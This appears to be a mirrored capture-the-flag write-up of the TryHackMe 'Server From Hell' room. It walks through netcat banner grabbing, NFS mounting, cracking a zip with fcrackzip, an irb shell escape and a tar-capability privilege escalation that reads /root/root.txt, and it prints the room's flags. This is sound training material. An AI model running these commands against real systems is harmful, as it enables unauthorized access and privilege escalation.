mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-25 21:30:17 +00:00
162 lines
3.4 KiB
Markdown
162 lines
3.4 KiB
Markdown
|
# TryHackMe-Server From Hell
|
||
|
|
||
|
> Abdullah Rizwan | 05:54 PM | 3rd November ,2020
|
||
|
|
||
|
## NMAP
|
||
|
|
||
|
```
|
||
|
Not shown: 94 closed ports
|
||
|
PORT STATE SERVICE VERSION
|
||
|
1/tcp open tcpmux?
|
||
|
| fingerprint-strings:
|
||
|
| NULL:
|
||
|
|_ 550 12345 0000000000000000000000000000000000000000000000000000000
|
||
|
3/tcp open compressnet?
|
||
|
| fingerprint-strings:
|
||
|
| NULL:
|
||
|
|_ 550 12345 0000000000000000000000000000000000000000000000000000000
|
||
|
4/tcp open unknown
|
||
|
| fingerprint-strings:
|
||
|
| NULL:
|
||
|
|_ 550 12345 0000000000000000000000000000000000000000000000000000000
|
||
|
6/tcp open unknown
|
||
|
........
|
||
|
|
||
|
There were many ports open in this box so can't really show how many ports were there
|
||
|
```
|
||
|
|
||
|
Looking at the description of the room it says about starting from `1337` ,so
|
||
|
|
||
|
## PORT 1337
|
||
|
|
||
|
`nc IP:1337`
|
||
|
|
||
|
```
|
||
|
Welcome traveller, to the beginning of your journey
|
||
|
To begin, find the trollface
|
||
|
Legend says he's hiding in the first 100 ports
|
||
|
Try printing the banners from the ports
|
||
|
|
||
|
```
|
||
|
This is the message we get when we connect to port 1337
|
||
|
|
||
|
I made a simple script to go over 100 ports and connect to it to grab banner
|
||
|
|
||
|
|
||
|
```
|
||
|
i=1
|
||
|
while [ $i -ne 100 ]
|
||
|
do
|
||
|
nc 10.10.173.96 $i
|
||
|
i=$(( $i + 1 ))
|
||
|
done
|
||
|
|
||
|
```
|
||
|
<img src="https://imgur.com/X2RBWne.png"/>
|
||
|
|
||
|
|
||
|
## PORT 12345
|
||
|
|
||
|
```
|
||
|
nc 10.10.173.96 12345
|
||
|
NFS shares are cool, especially when they are misconfigured
|
||
|
It's on the standard port, no need for another scan
|
||
|
```
|
||
|
|
||
|
## PORT 2049
|
||
|
|
||
|
The default port of `nfs` share is 2049 so lets see if there are any shares that we can mount on our local machine
|
||
|
|
||
|
<img src="https://imgur.com/ZsfnVwC.png"/>
|
||
|
|
||
|
Now let's mount that share
|
||
|
|
||
|
<img src="https://imgur.com/SDYKjPV.png"/>
|
||
|
|
||
|
We only find a `backup.zip`
|
||
|
|
||
|
<img src="https://imgur.com/VVLeFOp.png"/>
|
||
|
|
||
|
But it asks for a password
|
||
|
|
||
|
<img src="https://imgur.com/PdxqCba.png"/>
|
||
|
|
||
|
### Fcrackzip
|
||
|
|
||
|
Now lets use this to bruteforce archive's password
|
||
|
|
||
|
```
|
||
|
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt backup.zip
|
||
|
|
||
|
|
||
|
PASSWORD FOUND!!!!: pw == zxcvbnm
|
||
|
```
|
||
|
<img src="https://imgur.com/mqLJMVD.png"/>
|
||
|
|
||
|
But I can't get to extract the files becasue `read-only file system` , so I used GUI to view what was in these files
|
||
|
|
||
|
<img src="https://imgur.com/0aJE2Xt.png"/>
|
||
|
|
||
|
And I was able to grab the flag,hint and ssh private key.
|
||
|
|
||
|
|
||
|
Now `hint.txt` says
|
||
|
|
||
|
```
|
||
|
2500-4500
|
||
|
```
|
||
|
|
||
|
I tried to ssh into the box using `hades` private but ssh port was not on 22
|
||
|
|
||
|
<img src="https://imgur.com/PfSORcz.png"/>
|
||
|
|
||
|
From the results of the scan I searched for ssh with openssh client
|
||
|
|
||
|
<img src="https://imgur.com/mgG3s7s.png"/>
|
||
|
|
||
|
And was logged in :D
|
||
|
|
||
|
<img src="https://imgur.com/2j3o2wy.png"/>
|
||
|
|
||
|
```
|
||
|
Welcome to hell. We hope you enjoy your stay!
|
||
|
irb(main):001:0> puts 'hello'
|
||
|
hello
|
||
|
=> nil
|
||
|
irb(main):002:0>
|
||
|
|
||
|
```
|
||
|
|
||
|
Now this `irb` is interactive ruby shell just like we get in python so in order to get a `/bin/bash` shell run
|
||
|
|
||
|
```
|
||
|
exec '/bin/bash'
|
||
|
```
|
||
|
|
||
|
<img src="https://imgur.com/TagPPFG.png"/>
|
||
|
|
||
|
## Privilege Escalation
|
||
|
|
||
|
Now the room gives us a hint about `getcap` this command tells that which file or binary has capability to access almost anything on the system so run
|
||
|
|
||
|
`getcap -r 2>/dev/null` (2>/dev/null ,here 2 just redirects Standard output error to null )
|
||
|
|
||
|
|
||
|
```
|
||
|
hades@hell:~$ getcap -r / 2>/dev/null
|
||
|
/usr/bin/mtr-packet = cap_net_raw+ep
|
||
|
/bin/tar = cap_dac_read_search+ep
|
||
|
```
|
||
|
Visiting `GTFOBINS`
|
||
|
|
||
|
https://gtfobins.github.io/gtfobins/tar/
|
||
|
```
|
||
|
hades@hell:~$ tar xf /root/root.txt -I '/bin/sh -c "cat 1>&2"'
|
||
|
thm{w0w_n1c3_3sc4l4t10n}
|
||
|
hades@hell:~$
|
||
|
|
||
|
```
|
||
|
|
||
|
|
||
|
|